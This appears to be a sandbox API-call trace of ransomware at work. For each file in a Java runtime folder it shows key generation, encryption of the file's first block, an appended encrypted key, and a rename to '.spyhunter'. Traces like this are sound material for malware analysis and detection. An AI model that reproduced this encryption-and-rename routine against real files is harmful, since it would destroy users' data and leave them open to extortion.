RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0172.889] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4d8*=0x30) returned 1 [0172.889] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\gray.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0172.891] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\GRAY.pf") returned 52 [0172.891] StrStrW (lpFirst="GRAY.pf", lpSrch=".txt") returned 0x0 [0172.891] GetProcessHeap () returned 0x2c0000 [0172.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0172.891] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e49c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e49c*=0x278, lpOverlapped=0x0) returned 1 [0172.895] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffd88, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.895] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x248e49c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e49c*=0x278, lpOverlapped=0x0) returned 1 [0172.896] GetProcessHeap () returned 0x2c0000 [0172.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0172.896] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.897] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e49c, lpOverlapped=0x0 | out: lpBuffer=0x248e4dc*, lpNumberOfBytesWritten=0x248e49c*=0x4, lpOverlapped=0x0) returned 1 [0172.897] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e49c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e49c*=0x30, lpOverlapped=0x0) returned 1 [0172.897] CloseHandle (hObject=0xb0) returned 1 [0172.898] GetProcessHeap () returned 0x2c0000 [0172.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.898] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\GRAY.pf.spyhunter") returned 62 [0172.898] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\gray.pf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\GRAY.pf.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\gray.pf.spyhunter")) returned 1 [0172.909] GetProcessHeap () returned 0x2c0000 [0172.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.910] GetProcessHeap () returned 0x2c0000 [0172.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0172.910] GetProcessHeap () returned 0x2c0000 [0172.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3878 | out: hHeap=0x2c0000) returned 1 [0172.911] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4d8 | out: pbBuffer=0x248e4d8) returned 1 [0172.911] GetProcessHeap () returned 0x2c0000 [0172.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0172.921] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4d0*=0x30) returned 1 [0172.921] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\ciexyz.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0172.923] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\CIEXYZ.pf") returned 54 [0172.937] StrStrW (lpFirst="CIEXYZ.pf", lpSrch=".txt") returned 0x0 [0172.937] GetProcessHeap () returned 0x2c0000 [0172.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0172.937] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e494, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e494*=0x2800, lpOverlapped=0x0) returned 1 [0172.976] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.976] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e494, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e494*=0x2800, lpOverlapped=0x0) returned 1 [0172.976] GetProcessHeap () returned 0x2c0000 [0172.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0172.976] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.976] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e494, lpOverlapped=0x0 | out: lpBuffer=0x248e4d4*, lpNumberOfBytesWritten=0x248e494*=0x4, lpOverlapped=0x0) returned 1 [0173.686] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e494, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e494*=0x30, lpOverlapped=0x0) returned 1 [0173.686] CloseHandle (hObject=0xb0) returned 1 [0173.686] GetProcessHeap () returned 0x2c0000 [0173.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0173.686] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\CIEXYZ.pf.spyhunter") returned 64 [0173.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\CIEXYZ.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\ciexyz.pf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\CIEXYZ.pf.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\ciexyz.pf.spyhunter")) returned 1 [0173.688] GetProcessHeap () returned 0x2c0000 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0173.688] GetProcessHeap () returned 0x2c0000 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0173.688] GetProcessHeap () returned 0x2c0000 [0173.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed37c0 | out: hHeap=0x2c0000) returned 1 [0173.688] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4d8 | out: pbBuffer=0x248e4d8) returned 1 [0173.688] GetProcessHeap () returned 0x2c0000 [0173.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0173.688] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4d0*=0x30) returned 1 [0173.688] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\tnameserv.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\tnameserv.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0173.690] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\tnameserv.exe") returned 54 [0173.690] StrStrW (lpFirst="tnameserv.exe", lpSrch=".txt") returned 0x0 [0173.690] GetProcessHeap () returned 0x2c0000 [0173.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0173.690] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e494, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e494*=0x2800, lpOverlapped=0x0) returned 1 [0173.825] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.825] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e494, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e494*=0x2800, lpOverlapped=0x0) returned 1 [0173.825] GetProcessHeap () returned 0x2c0000 [0173.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0173.825] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.825] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e494, lpOverlapped=0x0 | out: lpBuffer=0x248e4d4*, lpNumberOfBytesWritten=0x248e494*=0x4, lpOverlapped=0x0) returned 1 [0173.921] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e494, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e494*=0x30, lpOverlapped=0x0) returned 1 [0173.921] CloseHandle (hObject=0xb0) returned 1 [0173.921] GetProcessHeap () returned 0x2c0000 [0173.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0173.921] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\tnameserv.exe.spyhunter") returned 64 [0173.922] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\tnameserv.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\tnameserv.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\tnameserv.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\tnameserv.exe.spyhunter")) returned 1 [0173.923] GetProcessHeap () returned 0x2c0000 [0173.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0173.923] GetProcessHeap () returned 0x2c0000 [0173.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0173.923] GetProcessHeap () returned 0x2c0000 [0173.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3598 | out: hHeap=0x2c0000) returned 1 [0173.925] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4d0 | out: pbBuffer=0x248e4d0) returned 1 [0173.925] GetProcessHeap () returned 0x2c0000 [0173.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0173.925] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4c8*=0x30) returned 1 [0173.925] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\rmiregistry.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\rmiregistry.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0173.927] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\rmiregistry.exe") returned 56 [0173.927] StrStrW (lpFirst="rmiregistry.exe", lpSrch=".txt") returned 0x0 [0173.927] GetProcessHeap () returned 0x2c0000 [0173.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0173.927] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e48c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e48c*=0x2800, lpOverlapped=0x0) returned 1 [0174.032] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.032] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e48c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e48c*=0x2800, lpOverlapped=0x0) returned 1 [0174.032] GetProcessHeap () returned 0x2c0000 [0174.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.032] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.032] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e48c, lpOverlapped=0x0 | out: lpBuffer=0x248e4cc*, lpNumberOfBytesWritten=0x248e48c*=0x4, lpOverlapped=0x0) returned 1 [0174.043] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e48c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e48c*=0x30, lpOverlapped=0x0) returned 1 [0174.057] CloseHandle (hObject=0xb0) returned 1 [0174.057] GetProcessHeap () returned 0x2c0000 [0174.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.057] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\rmiregistry.exe.spyhunter") returned 66 [0174.057] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\rmiregistry.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\rmiregistry.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\rmiregistry.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\rmiregistry.exe.spyhunter")) returned 1 [0174.059] GetProcessHeap () returned 0x2c0000 [0174.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.059] GetProcessHeap () returned 0x2c0000 [0174.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0174.059] GetProcessHeap () returned 0x2c0000 [0174.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f940 | out: hHeap=0x2c0000) returned 1 [0174.059] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4d0 | out: pbBuffer=0x248e4d0) returned 1 [0174.059] GetProcessHeap () returned 0x2c0000 [0174.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0174.059] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4c8*=0x30) returned 1 [0174.059] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\prism-d3d.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\prism-d3d.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0174.060] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\prism-d3d.dll") returned 54 [0174.060] StrStrW (lpFirst="prism-d3d.dll", lpSrch=".txt") returned 0x0 [0174.060] GetProcessHeap () returned 0x2c0000 [0174.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.060] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e48c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e48c*=0x2800, lpOverlapped=0x0) returned 1 [0174.088] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.088] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e48c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e48c*=0x2800, lpOverlapped=0x0) returned 1 [0174.088] GetProcessHeap () returned 0x2c0000 [0174.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.088] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.088] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e48c, lpOverlapped=0x0 | out: lpBuffer=0x248e4cc*, lpNumberOfBytesWritten=0x248e48c*=0x4, lpOverlapped=0x0) returned 1 [0174.089] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e48c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e48c*=0x30, lpOverlapped=0x0) returned 1 [0174.089] CloseHandle (hObject=0xb0) returned 1 [0174.089] GetProcessHeap () returned 0x2c0000 [0174.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.090] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\prism-d3d.dll.spyhunter") returned 64 [0174.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\prism-d3d.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\prism-d3d.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\prism-d3d.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\prism-d3d.dll.spyhunter")) returned 1 [0174.091] GetProcessHeap () returned 0x2c0000 [0174.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.091] GetProcessHeap () returned 0x2c0000 [0174.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0174.091] GetProcessHeap () returned 0x2c0000 [0174.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed32b8 | out: hHeap=0x2c0000) returned 1 [0174.132] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4c8 | out: pbBuffer=0x248e4c8) returned 1 [0174.132] GetProcessHeap () returned 0x2c0000 [0174.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0174.133] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4c0*=0x30) returned 1 [0174.133] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\orbd.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\orbd.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0174.137] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\orbd.exe") returned 49 [0174.137] StrStrW (lpFirst="orbd.exe", lpSrch=".txt") returned 0x0 [0174.137] GetProcessHeap () returned 0x2c0000 [0174.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0174.137] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e484, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e484*=0x2800, lpOverlapped=0x0) returned 1 [0174.150] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.150] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e484, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e484*=0x2800, lpOverlapped=0x0) returned 1 [0174.150] GetProcessHeap () returned 0x2c0000 [0174.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0174.150] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.150] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e484, lpOverlapped=0x0 | out: lpBuffer=0x248e4c4*, lpNumberOfBytesWritten=0x248e484*=0x4, lpOverlapped=0x0) returned 1 [0174.151] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e484, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e484*=0x30, lpOverlapped=0x0) returned 1 [0174.151] CloseHandle (hObject=0xb0) returned 1 [0174.151] GetProcessHeap () returned 0x2c0000 [0174.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.152] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\orbd.exe.spyhunter") returned 59 [0174.152] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\orbd.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\orbd.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\orbd.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\orbd.exe.spyhunter")) returned 1 [0174.153] GetProcessHeap () returned 0x2c0000 [0174.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.153] GetProcessHeap () returned 0x2c0000 [0174.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0174.153] GetProcessHeap () returned 0x2c0000 [0174.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21990 | out: hHeap=0x2c0000) returned 1 [0174.153] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e4c8 | out: pbBuffer=0x248e4c8) returned 1 [0174.153] GetProcessHeap () returned 0x2c0000 [0174.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0174.153] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e4c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e4c0*=0x30) returned 1 [0174.153] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\npoji610.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\npoji610.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0174.154] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\npoji610.dll") returned 53 [0174.154] StrStrW (lpFirst="npoji610.dll", lpSrch=".txt") returned 0x0 [0174.154] GetProcessHeap () returned 0x2c0000 [0174.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0174.154] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e484, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e484*=0x2800, lpOverlapped=0x0) returned 1 [0174.287] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.287] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e484, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e484*=0x2800, lpOverlapped=0x0) returned 1 [0174.287] GetProcessHeap () returned 0x2c0000 [0174.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0174.288] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.288] WriteFile (in: hFile=0xb0, lpBuffer=0x248e4c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e484, lpOverlapped=0x0 | out: 